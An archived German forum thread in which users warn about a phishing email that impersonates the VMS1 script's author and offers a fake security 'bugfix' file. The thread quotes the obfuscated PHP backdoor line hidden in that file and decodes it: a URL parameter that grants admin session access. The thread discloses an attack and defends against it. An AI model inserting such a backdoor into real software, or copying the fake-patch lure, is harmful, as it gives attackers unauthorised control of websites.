PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Email Spamm 20.05.2013



marcaust
20.05.2013, 14:53
Hi

Ich hab eben die Mail erhalten:


Hallo,

du verwendest auf deiner Seite das VMS1 Script von designerscripte.net, dieses enthält jedoch beim Adminlogin einen großen Sicherheitsfehler.

Dieser wurde noch nicht ausgemerzt und anscheinend auch noch nicht missbraucht. Trotzdem habe ich dafür jetzt ein Bugfix entwickelt.

Um den Fehler zu beheben bitte einfach die Datei adminforce/index.php deiner Installation durch die im Anhang ersetzen, dort ist eine zusätzliche Sicherheitsklasse integriert. Dieser Bugfix wird wärmstens von mir empfohlen.

vG
Joel Kuder
Admin Designerscripte.net, Snippis & LKTechnik
http://www.designerscripte.net/ - Home of VMS1

Das Problem an dieser Mail ist, das die Angebliche Sicherheitslücke nicht!! existiert.
Ganz im Gegenteil, tauscht man die in der Anlage befindliche index.php aus, öffnet man jedem der den geänderten Code entschlüsseln kann den Zugang zu einem Adminforce und das ist wohl nicht erwünscht.

Also auf KEINEN Fall die Index.php austauschen. Der Code der in Zeile 15 steht (Base64 verschlüsselt) ist schädlich.

Grüße
Marc

Lokutos
20.05.2013, 15:03
Ich wurde darüber informiert das in meinem Nahmen Mails versendet werden.

Die Emails Sind SPAMM
Installiert dieses "Bugfix" NICHT.
Wer diese Datei bereits eingefügt hat Sollte diese Umgehend entfernen.
Die Originaldatei kann im Downloadbereich heruntergeladen werden.


Ich sende emails nur von Topleveldomains wie Designerscripte.net oderlktechnik.ch
von arcor 1und1 web.de etc werdet ihr NIEMALS emails von mir bekommen.

Ich werde gegen Richard Strafanzeige stellen.


Gesendet: Montag, 20. Mai 2013 um 13:21 UhrVon: yunn@arcor.de
Betreff: Aw: Sicherheits-Patch: VMS1
Und hier wäre der Bugfix. Aus unerklärlichen Gründen konnte ich den gerade nicht anhängen.

vG
Joel Kuder
Admin Designerscripte.net, Snippis & LKTechnik
http://www.designerscripte.net/ - Home of VMS1

----- Original Nachricht ----
Von: yunn@arcor.de
Datum: 20.05.2013 13:20
Betreff: Sicherheits-Patch: VMS1

> Hallo,
>
> du verwendest auf deiner Seite das VMS1 Script von designerscripte.net,
> dieses enthält jedoch beim Adminlogin einen großen Sicherheitsfehler.
>
> Dieser wurde noch nicht ausgemerzt und anscheinend auch noch nicht
> missbraucht. Trotzdem habe ich dafür jetzt ein Bugfix entwickelt.
>
> Um den Fehler zu beheben bitte einfach die Datei adminforce/index.php deiner
> Installation durch die im Anhang ersetzen, dort ist eine zusätzliche
> Sicherheitsklasse integriert. Dieser Bugfix wird wärmstens von mir
> empfohlen.
>
> vG
> Joel Kuder
> Admin Designerscripte.net, Snippis & LKTechnik
> http://www.designerscripte.net/ - Home of VMS1


>
Anhang:


Aufklärung:

Folgender eingefügter Code (in der Datei:)

<?php if($_GET[base64_decode('cmljaGFyZA==')]==base64_decode('amE=')){$_SESSION[base64_decode('YWRtaW4=')]=1;}?>
bedeutet gleich viel wie:

<?php if($_GET['richard']=='ja'){$_SESSION['admin']=1;}?>

Bedeutet wenn url.tld/admin/index.php?richard=ja aufgerufen wird ist man eingeloggt!!!

jpwfour
20.05.2013, 15:05
Hast du mal geschaut, von wem die EMail kam? Also im Quelltext der Mail (falls die Absenderadresse gefaked wurde).
Kam die Mail an die Adresse aus deinem Impressum, oder die mit der du hier auf DSN angeeldet bist?

Achso: Adminforce sollte eh via .htaccess mit einem extra Passwort geschützt sein, dann kann einem das auch egal sein, ob der PHP Login eine Sicherheitslücke hätte (was er ja nicht hat).

marcaust
20.05.2013, 15:14
Hab gerade mal nachgeschaut, die Mail kam an eine Adresse die weder hier noch auf meiner Seite steht aber hier vor einiger Zeit mal eingetragen war.
Der Absender ist yunn@arcor.de, also eine einfach angelegte E-Mail Adresse

Smoopie
20.05.2013, 16:24
wird ja immer schlimmer mit dem kerl müssen doch jetzt schon einige anzeigen gegen ihn laufen oder nicht ?

Worka
20.05.2013, 18:59
Ggf. versucht er deswegen in den bekannten Foren (nicht nur auf Klamm.de) die Threads über sich schliessen zu lassen.
Die Anzeigenflut wird der Familie vielleicht inzwischen lässtig.